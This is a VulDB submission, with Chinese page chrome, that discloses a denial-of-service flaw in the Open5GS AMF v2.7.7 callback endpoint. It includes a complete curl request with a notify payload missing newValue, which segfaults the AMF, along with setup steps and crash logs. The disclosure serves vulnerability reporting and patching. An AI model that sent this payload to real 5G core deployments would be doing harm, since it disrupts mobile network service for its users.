提交 #804023: Open5GS AMF v2.7.7 Denial of Service信息

标题	Open5GS AMF v2.7.7 Denial of Service
描述	### Open5GS Release, Revision, or Tag v2.7.7 ### Description AMF crashes when it receives `POST /namf-callback/v1/{anything}/sdmsubscription-notify` with a `ModificationNotification` whose `changeItem` omits `newValue`. The `ChangeItem` parser accepts a missing `newValue`, but `amf_namf_callback_handle_sdm_data_change_notify()` later calls `update_ambr()`, which unconditionally dereferences `item_change->new_value->json`. This makes the callback route remotely crashable with a single HTTP request. ### Steps to reproduce 1. Start the official Open5GS v2.7.7 Docker deployment. 2. Register a real UE so that the callback can reference a valid SUPI. In my live setup I used the existing MongoDB subscriber: ```text IMSI: 001011234567891 K: 00000000000000000000000000000000 OPC: 00000000000000000000000000000000 AMF: 8000 DNN: internet S-NSSAI: SST=1, SD=1 ``` 3. Bring up a UERANSIM gNB and UE on the same Docker network and wait until the UE is fully registered. In my live setup the AMF log showed: ```text [imsi-001011234567891] Registration complete ``` 4. Send the following HTTP/2 callback request to the AMF SBI endpoint (`http://10.33.33.9:80` in my live setup): ```bash curl --http2-prior-knowledge -m 5 -sS -i \ -X POST http://10.33.33.9/namf-callback/v1/x/sdmsubscription-notify \ -H 'content-type: application/json' \ --data '{"notifyItems":[{"resourceId":"imsi-001011234567891/am-data","changes":[{"op":"REMOVE","path":"/foo"}]}]}' ``` 5. Check the AMF container state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf docker logs --tail 80 amf ``` ### Logs ```text 04/10 15:51:47.137: [gmm] INFO: [imsi-001011234567891] Registration complete /usr/local/bin/entrypoint.sh: line 10: 8 Segmentation fault (core dumped) open5gs-amfd "${@}" ``` ### Expected behaviour AMF should reject the malformed callback with a normal HTTP error such as `400 Bad Request`, and the AMF process should remain running. ### Observed Behaviour The HTTP/2 stream terminates abnormally, no proper error response is returned, and the AMF process exits with code `139` due to a segmentation fault. ### eNodeB/gNodeB UERANSIM gNB v3.2.7 ### UE Models and versions UERANSIM UE v3.2.7
来源	⚠️ https://github.com/open5gs/open5gs/issues/4395
用户	ZiyuLin (UID 93568)
提交	2026-04-14 04時01分 (2 月前)
管理	2026-04-30 18時26分 (17 days later)
状态	已接受
VulDB条目	360332 [Open5GS 直到 2.7.7 AMF SBI Endpoint sdmsubscription-notify amf_namf_callback_handle_sdm_data_change_notify changeItem.newValue 拒绝服务]
积分	20

◂ 上一步一览下一步 ▸

Might our Artificial Intelligence support you?

Check our Alexa App!